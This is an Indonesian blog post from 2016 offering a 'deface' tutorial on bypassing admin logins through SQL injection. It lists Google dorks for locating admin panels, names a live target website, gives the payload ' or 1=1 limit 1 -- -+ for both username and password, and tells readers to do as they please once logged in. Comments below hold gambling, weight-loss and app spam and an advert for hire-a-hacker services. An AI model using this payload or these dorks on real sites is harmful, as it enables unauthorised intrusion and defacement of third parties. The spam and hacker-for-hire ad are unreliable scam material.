Jumat, 11 November 2016

Tutorial Deface - Bypass SQL Login

Hello Brother and Sister~ kali ini UnknownSec akan membahas mengenai "Bypass SQL Login"

Maksudnya gimana?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih
"bypass = bye bye password"

Tutorial:.

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/


[#] Langkah-langkah

1. Cari target melalui Dork diatas diGoogle.

Live target:

http://preprojects.com/hostfriendz/int/index.php


2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :

user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+

 

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Mudah bukan? ^_^

thanks to Mr Xenophobic ^_^


Sumber:

http://indocyberarmy.blogspot.co.id/2014/01/tutorial-bypass-sql-login.html

8 komentar:

  1. Ini Materi Punya Orang Yak lu ambil?soalnya keliatan di gambarnya indocyberarmy.blogspot.com:v

    BalasHapus
  2. Togel salah satu permainan judi online yang sangat mudah bagi orang - orang, mungkin ada sebagian dari anda yang tidak pernah berhasil tebak angka tersebut. Nah Bandar resmi ini menyediakan cara menang togel 4 angka . Untuk informasi lebih lanjut sialhkan anda kunjungi langsung blog unsurtoto

    BalasHapus
  3. As claimed by Stanford Medical, It is in fact the SINGLE reason this country's women get to live 10 years longer and weigh an average of 19 kilos less than us.

    (And really, it has NOTHING to do with genetics or some secret-exercise and EVERYTHING related to "HOW" they eat.)

    P.S, I said "HOW", and not "WHAT"...

    CLICK on this link to reveal if this brief quiz can help you unlock your true weight loss possibilities

    BalasHapus
  4. Jika anda tertarik dengan aplikasi atau layanan absensi online, anda dapat mengunjungi blog yang saya buat :)
    Aplikasi Absensi Online

    BalasHapus
  5. THEY ARE JUST THE BEST, I HAVE TRIED SO MANY HACKERS. THEY ARE JUST DIFFERENT AND UNIQUE. IF YOU WANT VALUE FOR YOUR MONEY, CONTACT THEM. A LOT OF PEOPLE ARE BEEN SCAMMED DAILY BECAUSE OF THEIR GREED, YOU WANT A PERFECT JOB BUT DON'T WANT TO PAY AND AT THE END OF THE DAY, YOU WILL CONTACT A HACKER WHO WILL COLLECT ANYTHING FROM YOU AND YOUR JOB IS NOT BEEN DONE. I CONSIDER SUCH PEOPLE AS SCAM BECAUSE THEY KNOW THE RIGHT SOURCE BUT BECAUSE THEY DON'T WANT TO SPEND THEIR MONEY TO GET A BETTER RESULT , THEY END UP WITH QUACK HACKERS.
    #I STAND FOR THE BEST#
    #I GO FOR THE BEST#
    #I CHOOSE THE BEST# hack.truth77@gmail.com

    BalasHapus